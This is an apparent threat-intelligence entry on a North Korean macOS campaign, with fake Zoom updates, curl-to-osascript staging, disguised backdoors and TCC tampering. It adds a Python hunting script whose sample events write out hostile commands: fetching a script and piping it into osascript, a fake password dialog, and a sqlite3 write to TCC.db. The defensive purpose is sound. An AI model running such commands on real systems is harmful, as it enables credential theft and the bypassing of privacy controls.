Dissecting macOS intrusion from lure to compromise
Essential information
- Published: 17/04/2026 08:37
- Modified: 17/04/2026 10:47
- Tags: 2026-04-17, applescript, com.apple.cli, com.google.chromes.updaters, credential harvesting, cryptocurrency theft, icloudz, macos, north korea, sapphire sleet, services, social engineering, softwareupdate.app, systemupdate.app, tcc bypass
- Related entities: 13 observables, 1 intrusion set (APT), 19 techniques (MITRE ATT&CK), 6 malware, 11 others
Description
Microsoft Threat Intelligence uncovered a macOS-focused campaign by the North Korean threat actor Sapphire Sleet that relies on social engineering for initial access. The chain begins with a malicious AppleScript file disguised as a Zoom SDK update; it fetches and runs further stages through curl-to-osascript chains, in which each payload is downloaded with curl and piped directly into osascript. For persistence and command execution the campaign installs several backdoors, including components named com.apple.cli, services, icloudz, and com.google.chromes.updaters, the first and last of which imitate Apple and Google naming conventions to blend in. Credentials are harvested through fake system dialogs that mimic legitimate macOS password prompts. The actor bypasses Transparency, Consent, and Control (TCC) protections by modifying the TCC database directly instead of letting the user be prompted; on current macOS the database is itself protected, so such a write presupposes that the malware has already obtained Full Disk Access or equivalent privileges. The resulting access is used for extensive data exfiltration targeting cryptocurrency wallets, browser credentials, Telegram sessions, SSH keys, and Apple Notes. Operations focus on cryptocurrency, finance, and blockchain organizations, with the primary objective of stealing digital assets.
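As an added illustration, not part of the original entry or of Microsoft's report, the following Python hunting script applies generic heuristics for the techniques named in the description (curl piped into osascript, an osascript password-style dialog with masked input, command-line SQLite against the TCC database, an AppleScript launched from a download folder, and a launchd label that claims an Apple or Google namespace while running from a user-writable path) to constructed process events and launchd items. The rules, file names, URLs and paths are assumptions of this example, not indicators taken from the campaign.

```python
"""Hunting heuristics for the macOS tradecraft summarised in the description.

Added example, not code from this page or from Microsoft's report. The event
records and launchd items below are constructed for illustration; the rules
are generic heuristics (assumptions of this example), not indicators taken
from the campaign.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    cmdline: str


@dataclass
class LaunchItem:
    label: str       # launchd Label key
    program: str     # resolved Program / ProgramArguments[0]
    plist_path: str


@dataclass
class Finding:
    rule: str
    evidence: str


# Vendor namespaces that persistence labels may imitate (assumption; the
# labels com.apple.cli and com.google.chromes.updaters motivate the rule).
VENDOR_PREFIXES = ("com.apple.", "com.google.")
# Locations from which a genuinely vendor-owned launch item would execute.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/Applications/", "/Library/Apple/")

OSASCRIPT = re.compile(r"(?:^|[\s/])osascript\b")
# curl output piped into osascript: the staging pattern the description calls a curl-to-osascript chain.
CURL_TO_OSASCRIPT = re.compile(r"\bcurl\b[^|]*\|\s*(?:\S*/)?osascript\b")
# AppleScript idiom for a password-style prompt with masked input.
HIDDEN_ANSWER = re.compile(r"display dialog.*with hidden answer", re.IGNORECASE)
# Command-line SQLite against the per-user or system TCC database.
TCC_DB = re.compile(r"\bsqlite3\b.*com\.apple\.TCC/TCC\.db")


def check_process(ev: ProcEvent) -> list[Finding]:
    """Apply the process-level rules to one event."""
    cmd = ev.cmdline
    found = []
    if CURL_TO_OSASCRIPT.search(cmd):
        found.append(Finding("curl_to_osascript", cmd))
    if OSASCRIPT.search(cmd) and HIDDEN_ANSWER.search(cmd):
        found.append(Finding("hidden_answer_dialog", cmd))
    if OSASCRIPT.search(cmd) and "/Downloads/" in cmd:
        found.append(Finding("osascript_from_downloads", cmd))
    if TCC_DB.search(cmd):
        found.append(Finding("tcc_db_access", cmd))
    return found


def check_launch_item(item: LaunchItem) -> list[Finding]:
    """Flag a vendor-namespaced label whose program lives outside vendor-owned paths."""
    if item.label.startswith(VENDOR_PREFIXES) and not item.program.startswith(TRUSTED_PREFIXES):
        return [Finding("vendor_label_untrusted_path",
                        f"{item.label} -> {item.program} ({item.plist_path})")]
    return []


def hunt(events: list[ProcEvent], items: list[LaunchItem]) -> list[Finding]:
    """Run every rule over the telemetry and return findings in input order."""
    findings = []
    for ev in events:
        findings.extend(check_process(ev))
    for item in items:
        findings.extend(check_launch_item(item))
    return findings


# Constructed sample telemetry; the file names, URLs and paths are invented.
SAMPLE_EVENTS = [
    ProcEvent(501, 1, "/usr/bin/osascript /Users/dev/Downloads/ZoomSDKUpdate.scpt"),
    ProcEvent(502, 501, "/bin/sh -c 'curl -fsSL https://stage.example.invalid/s2 | osascript'"),
    ProcEvent(503, 502, '/usr/bin/osascript -e \'display dialog "System requires your password" default answer "" with hidden answer\''),
    ProcEvent(504, 502, '/usr/bin/sqlite3 "/Users/dev/Library/Application Support/com.apple.TCC/TCC.db" "UPDATE access SET auth_value=2"'),
    ProcEvent(505, 1, "/usr/bin/curl -s https://example.invalid/health"),  # benign control
]
SAMPLE_LAUNCH_ITEMS = [
    LaunchItem("com.apple.cli", "/Users/dev/Library/Caches/.cli",
               "/Users/dev/Library/LaunchAgents/com.apple.cli.plist"),
    LaunchItem("com.google.chromes.updaters", "/Users/dev/Library/Application Support/.upd/updater",
               "/Users/dev/Library/LaunchAgents/com.google.chromes.updaters.plist"),
    LaunchItem("com.apple.example", "/System/Library/CoreServices/example",
               "/System/Library/LaunchAgents/com.apple.example.plist"),  # benign control
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS, SAMPLE_LAUNCH_ITEMS):
        print(f"[{f.rule}] {f.evidence}")
```

Run against real telemetry, the process rules belong on EDR process-creation events or the unified log, and the launchd rule on an inventory of ~/Library/LaunchAgents and /Library/LaunchAgents. The sqlite3 rule only fires once an attacker is already privileged enough to write TCC.db, so the earlier rules (curl-to-osascript staging and the hidden-answer dialog) are the ones that catch the intrusion before data starts leaving.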